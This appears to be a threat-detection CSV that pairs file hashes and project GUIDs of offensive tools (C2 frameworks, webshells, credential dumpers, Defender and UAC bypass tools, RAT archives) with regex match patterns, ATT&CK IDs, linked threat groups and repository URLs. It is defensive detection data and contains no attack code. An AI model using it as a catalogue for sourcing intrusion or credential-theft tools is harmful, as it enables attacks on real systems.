"*0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761*",".{0,1000}0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","21425"
"*0ac82760-3e0d-4124-bd1c-92c8dab97171*",".{0,1000}0ac82760\-3e0d\-4124\-bd1c\-92c8dab97171.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","21426"
"*0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44*",".{0,1000}0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21427"
"*0acf29e9ae705e5518a55e9020f69e9bdc9348d6374d054720b6169cfdc5ca87*",".{0,1000}0acf29e9ae705e5518a55e9020f69e9bdc9348d6374d054720b6169cfdc5ca87.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21428"
"*0acffe2314b3329c3a984cd5b402bf17e1de0305b38d9e1daa5f566182dbef6f*",".{0,1000}0acffe2314b3329c3a984cd5b402bf17e1de0305b38d9e1daa5f566182dbef6f.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","21429"
"*0ad1f9bb7c3b296339d3c3f9bb4338b79bfb9f051fbb8749c411c44195e68d35*",".{0,1000}0ad1f9bb7c3b296339d3c3f9bb4338b79bfb9f051fbb8749c411c44195e68d35.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","21430"
"*0ad2c8d20a383ac7007bb531672f8cbb9fe945b8d32eefa061b4ead09ff92ce3*",".{0,1000}0ad2c8d20a383ac7007bb531672f8cbb9fe945b8d32eefa061b4ead09ff92ce3.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","21431"
"*0ADFD1F0-7C15-4A22-87B4-F67E046ECD96*",".{0,1000}0ADFD1F0\-7C15\-4A22\-87B4\-F67E046ECD96.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#GUIDproject","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","21433"
"*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21434"
"*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21435"
"*0ae164e1f157f452b32b06e43b828d792daa447b535b08330f942ade8b87d70b*",".{0,1000}0ae164e1f157f452b32b06e43b828d792daa447b535b08330f942ade8b87d70b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21436"
"*0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f*",".{0,1000}0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","21437"
"*0aed5355351bc856a6a92d226188bb66a13a8324792fb112f39401e080180e81*",".{0,1000}0aed5355351bc856a6a92d226188bb66a13a8324792fb112f39401e080180e81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21438"
"*0aed5bc1f0d272aa57c3a1286499e49633de6f192cbec67f5f7b536d96fefe8e*",".{0,1000}0aed5bc1f0d272aa57c3a1286499e49633de6f192cbec67f5f7b536d96fefe8e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21439"
"*0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76*",".{0,1000}0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21441"
"*0af38acc5d64d86e6519d46d9880a147528eb5fa99dfa456f8ce8009c1dd1d2b*",".{0,1000}0af38acc5d64d86e6519d46d9880a147528eb5fa99dfa456f8ce8009c1dd1d2b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21442"
"*0af6b417e2069876a8530e9ca0056ddc12b24f348e1d4a531add0760b8d11236*",".{0,1000}0af6b417e2069876a8530e9ca0056ddc12b24f348e1d4a531add0760b8d11236.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21444"
"*0b0acd531970ccc941de33b65aed8a93a93374fa9d2791fb210e38828098db85*",".{0,1000}0b0acd531970ccc941de33b65aed8a93a93374fa9d2791fb210e38828098db85.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","21446"
"*0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65*",".{0,1000}0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21448"
"*0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79*",".{0,1000}0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","#filehash","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","21449"
"*0b2cf2f9b7ff24e97c75b4791a431011d1e58824491a1e4b63ff6eeae13282cb*",".{0,1000}0b2cf2f9b7ff24e97c75b4791a431011d1e58824491a1e4b63ff6eeae13282cb.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21452"
"*0b3472c651db8cc9991a92097c22dc4cab8467aff96591f76fb89bc3af8eadaa*",".{0,1000}0b3472c651db8cc9991a92097c22dc4cab8467aff96591f76fb89bc3af8eadaa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21454"
"*0b3502ac778c671bad537e6433a8f58ec4e1f9a7ab34d37a7bb1bf8c08b2dcf7*",".{0,1000}0b3502ac778c671bad537e6433a8f58ec4e1f9a7ab34d37a7bb1bf8c08b2dcf7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21455"
"*0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9*",".{0,1000}0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21456"
"*0b41b2fcd0f1a4e913d3efe293f713849d59efebb27bac060ab31bed51ac2f6b*",".{0,1000}0b41b2fcd0f1a4e913d3efe293f713849d59efebb27bac060ab31bed51ac2f6b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21457"
"*0b4559dcd86d86e5c0cd54f123fdcf2d7011472a1b134aeb3ed14782a4578111*",".{0,1000}0b4559dcd86d86e5c0cd54f123fdcf2d7011472a1b134aeb3ed14782a4578111.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21459"
"*0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f*",".{0,1000}0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21460"
"*0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f*",".{0,1000}0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21461"
"*0b588d69dcb8efba81185ac65ec8a9ac051aaf3309523a01d2d360d2d283a0a7*",".{0,1000}0b588d69dcb8efba81185ac65ec8a9ac051aaf3309523a01d2d360d2d283a0a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21462"
"*0b5aa7a7f74d9fb5251bbff02e7ac43a3cf47be0a2f02d5a208ebd37032d12cf*",".{0,1000}0b5aa7a7f74d9fb5251bbff02e7ac43a3cf47be0a2f02d5a208ebd37032d12cf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21463"
"*0b5f0373ab8388f655fe01309ff6a58e96e969d8a94a06b5a05dce11c998f2f0*",".{0,1000}0b5f0373ab8388f655fe01309ff6a58e96e969d8a94a06b5a05dce11c998f2f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21464"
"*0b6a762812a1fbfda681951fbd60bcaa919b99e6e61df84a251f800bb4479a0e*",".{0,1000}0b6a762812a1fbfda681951fbd60bcaa919b99e6e61df84a251f800bb4479a0e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21466"
"*0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27*",".{0,1000}0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","21467"
"*0B6D8B01-861E-4CAF-B1C9-6670884381DB*",".{0,1000}0B6D8B01\-861E\-4CAF\-B1C9\-6670884381DB.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","0","#GUIDproject","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","21468"
"*0b7662a80318e6fe243f57a7a1acd74d310f25a4876dc9a1ddaad9cb164b8ac3*",".{0,1000}0b7662a80318e6fe243f57a7a1acd74d310f25a4876dc9a1ddaad9cb164b8ac3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21471"
"*0b76a0444f290530c45bb0e0dda192ef0e316e5e76133e34be07b383880c959c*",".{0,1000}0b76a0444f290530c45bb0e0dda192ef0e316e5e76133e34be07b383880c959c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21472"
"*0b793ad164bdf239eec2eb25f1a153a51b9b0e57afd9e3b411621592b224b514*",".{0,1000}0b793ad164bdf239eec2eb25f1a153a51b9b0e57afd9e3b411621592b224b514.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21473"
"*0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420*",".{0,1000}0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21474"
"*0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b*",".{0,1000}0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21478"
"*0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508*",".{0,1000}0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","21480"
"*0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4*",".{0,1000}0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21482"
"*0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a*",".{0,1000}0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","#filehash","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","21485"
"*0baa85ef3689d4e9c15d6d64dfd4e4b633db4af6bad347eaf06a2f320d82074e*",".{0,1000}0baa85ef3689d4e9c15d6d64dfd4e4b633db4af6bad347eaf06a2f320d82074e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21486"
"*0bb4b892f67fdf903ed5e5df2c85c5ccb71669c298736cf24284412de435509a*",".{0,1000}0bb4b892f67fdf903ed5e5df2c85c5ccb71669c298736cf24284412de435509a.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","#filehash","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","21489"
"*0bb60287c127bcef5b7018b3b692eb7a91dab1a034fa65780b5e14333a63f62b*",".{0,1000}0bb60287c127bcef5b7018b3b692eb7a91dab1a034fa65780b5e14333a63f62b.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21490"
"*0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215*",".{0,1000}0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21491"
"*0bb88564a22bfd6d9ad6e4d8efa9077792a7b6094c2a0f865d70c43e11507352*",".{0,1000}0bb88564a22bfd6d9ad6e4d8efa9077792a7b6094c2a0f865d70c43e11507352.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21492"
"*0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04*",".{0,1000}0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","21494"
"*0bc53792d88e1638eb0772b7b3bad8cf04d4bb68d958fea9ddac7df9a8d09b77*",".{0,1000}0bc53792d88e1638eb0772b7b3bad8cf04d4bb68d958fea9ddac7df9a8d09b77.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21495"
